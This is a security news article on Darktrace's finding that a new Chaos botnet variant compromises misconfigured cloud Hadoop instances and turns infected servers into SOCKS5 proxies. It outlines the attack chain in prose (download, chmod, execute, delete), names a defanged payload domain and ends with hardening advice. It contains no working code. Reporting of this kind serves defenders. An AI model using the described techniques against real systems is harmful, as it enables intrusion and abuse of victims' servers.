Chaos Botnet Evolves to Exploit Misconfigured Cloud Hadoop with SOCKS Proxy

Security teams should take notice. Researchers at Darktrace said a new Chaos malware variant is now targeting vulnerabilities like misconfigured cloud deployments, not just routers and edge devices.

Darktrace discovered the activity in its global honeypot network called CloudyPots. The company said the specific hit came against an intentionally misconfigured Hadoop instance that allowed remote code execution. “Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices,” Darktrace said.

What Chaos is and where it came from

Lumen’s Black Lotus Labs first documented Chaos in September 2022. Lumen described it as a Go-based, cross-platform threat with a long feature set. Lumen found Chaos can run remote shell commands, drop modules, brute-force SSH keys to spread, mine cryptocurrency, and stage DDoS attacks.

According to Lumen, the malware has DDoS tooling for multiple protocols. Those include:

• HTTP
• TLS
• TCP
• UDP
• WebSocket

Darktrace and Lumen both link Chaos to earlier Kaiji code. Lumen noted code overlap that suggests Chaos evolved from Kaiji. Darktrace added that recent samples appear refactored and restructured.

How the Hadoop compromise unfolded

Darktrace said the attack started with an HTTP request to create a new application on the Hadoop service. The application carried a command sequence that downloaded a binary from an attacker’s server, made it executable, ran it, and then removed the file to reduce traces. Darktrace described the sequence as a staged download, permission change, execution, and cleanup.

The domain used to host the payload, pan.tenire[.]com, was previously tied to an email campaign called Operation Silk Lure. Seqrite Labs reported that campaign in October 2025 and linked it to the ValleyRAT remote-access Trojan. Darktrace highlighted the domain reuse while analyzing the Chaos activity.

What changed in the new Chaos sample

Darktrace said the sample they captured is a 64-bit ELF binary that retains core features such as systemd persistence and a keep-alive script stored on disk. The company noted developers reworked many functions. Darktrace observed that routines for SSH spreading and router exploitation appear removed in this build.

Instead, the new build adds a SOCKS proxy feature. Darktrace explained that when the malware receives a StartProxy command from its command and control server, it opens a listener and acts as a SOCKS5 proxy. That lets attackers route traffic through compromised servers and mask the real origin of malicious activity.

Researchers at Darktrace said the proxy capability likely signals a shift toward monetization. The company pointed to other botnets such as Aisuru that moved into offering proxy services to criminals. Darktrace commented that proxy services broaden a botnet operator’s options beyond cryptomining and DDoS.

What defenders should do now

Darktrace warned organizations to harden cloud configurations and patch known CVEs. The vendor emphasized that misconfigured cloud services present a growing attack surface as botnets adapt. “The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial of service is no longer the only risk these botnets pose to organizations and their security teams,” Darktrace said.

Security teams should audit exposed services, enforce least privilege, rotate SSH keys, and apply timely patches. Logging and network segmentation make it harder for attackers to convert a single compromise into a persistent foothold.

As Chaos continues to evolve, attribution remains uncertain. Darktrace noted Chinese-language artifacts and some China-based infrastructure in samples they analyzed, but the company stopped short of definitive attribution.

#ChaosMalware #CloudSecurity #Botnet #SOCKSProxy #Darktrace #Infosec